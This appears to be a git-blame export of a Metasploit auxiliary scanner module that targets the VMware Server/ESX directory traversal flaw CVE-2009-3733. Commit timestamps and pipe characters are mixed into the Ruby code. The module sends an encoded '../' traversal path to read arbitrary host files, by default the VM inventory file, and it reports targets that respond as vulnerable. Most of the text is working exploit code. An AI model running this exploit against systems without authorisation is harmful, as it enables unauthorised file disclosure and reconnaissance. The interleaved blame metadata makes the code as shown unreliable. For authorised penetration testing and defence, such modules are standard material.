2010-02-25 00:13:56 +00:00
|
|
|
##
|
2014-10-17 16:47:33 +00:00
|
|
|
# This module requires Metasploit: http://metasploit.com/download
|
2013-10-15 18:50:46 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2010-02-24 23:58:51 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
2016-03-07 08:56:58 +00:00
|
|
|
class Metasploit < Msf::Auxiliary
|
2010-02-25 00:13:56 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
# Exploit mixins should be called first
|
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
|
|
# Scanner mixin should be near last
|
|
|
|
include Msf::Auxiliary::Scanner
|
|
|
|
include Msf::Auxiliary::Report
|
2010-02-24 23:58:51 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def initialize
|
|
|
|
super(
|
|
|
|
'Name' => 'VMware Server Directory Traversal Vulnerability',
|
|
|
|
'Description' => 'This modules exploits the VMware Server Directory Traversal
|
|
|
|
vulnerability in VMware Server 1.x before 1.0.10 build 203137 and 2.x before
|
|
|
|
2.0.2 build 203138 on Linux, VMware ESXi 3.5, and VMware ESX 3.0.3 and 3.5
|
|
|
|
allows remote attackers to read arbitrary files. Common VMware server ports
|
|
|
|
80/8222 and 443/8333 SSL. If you want to download the entire VM, check out
|
|
|
|
the gueststealer tool.',
|
|
|
|
'Author' => 'CG' ,
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'References' =>
|
|
|
|
[
|
|
|
|
[ 'URL', 'http://www.vmware.com/security/advisories/VMSA-2009-0015.html' ],
|
|
|
|
[ 'OSVDB', '59440' ],
|
|
|
|
[ 'BID', '36842' ],
|
|
|
|
[ 'CVE', '2009-3733' ],
|
|
|
|
[ 'URL', 'http://fyrmassociates.com/tools/gueststealer-v1.1.pl' ]
|
|
|
|
]
|
|
|
|
)
|
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
Opt::RPORT(8222),
|
|
|
|
OptString.new('FILE', [ true, "The file to view", '/etc/vmware/hostd/vmInventory.xml']),
|
|
|
|
OptString.new('TRAV', [ true, "Traversal Depth", '/sdk/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E']),
|
|
|
|
], self.class)
|
|
|
|
end
|
2010-02-24 23:58:51 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def run_host(target_host)
|
2010-02-24 23:58:51 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
begin
|
|
|
|
file = datastore['FILE']
|
|
|
|
trav = datastore['TRAV']
|
|
|
|
res = send_request_raw({
|
|
|
|
'uri' => trav+file,
|
|
|
|
'version' => '1.1',
|
|
|
|
'method' => 'GET'
|
|
|
|
}, 25)
|
2010-02-24 23:58:51 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
if res.nil?
|
|
|
|
print_error("Connection timed out")
|
|
|
|
return
|
|
|
|
end
|
2013-08-21 06:10:46 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
if res.code == 200
|
|
|
|
#print_status("Output Of Requested File:\n#{res.body}")
|
|
|
|
print_status("#{target_host}:#{rport} appears vulnerable to VMWare Directory Traversal Vulnerability")
|
|
|
|
report_vuln(
|
|
|
|
{
|
|
|
|
:host => target_host,
|
|
|
|
:port => rport,
|
|
|
|
:proto => 'tcp',
|
|
|
|
:name => self.name,
|
|
|
|
:info => "Module #{self.fullname} reports directory traversal of #{target_host}:#{rport} with response code #{res.code}",
|
|
|
|
:refs => self.references,
|
|
|
|
:exploited_at => Time.now.utc
|
|
|
|
}
|
|
|
|
)
|
|
|
|
else
|
|
|
|
vprint_status("Received #{res.code} for #{trav}#{file}")
|
|
|
|
end
|
2010-02-24 23:58:51 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e
|
|
|
|
print_error(e.message)
|
|
|
|
rescue ::Timeout::Error, ::Errno::EPIPE
|
|
|
|
end
|
|
|
|
end
|
2010-02-24 23:58:51 +00:00
|
|
|
|
2010-02-25 00:13:56 +00:00
|
|
|
end
|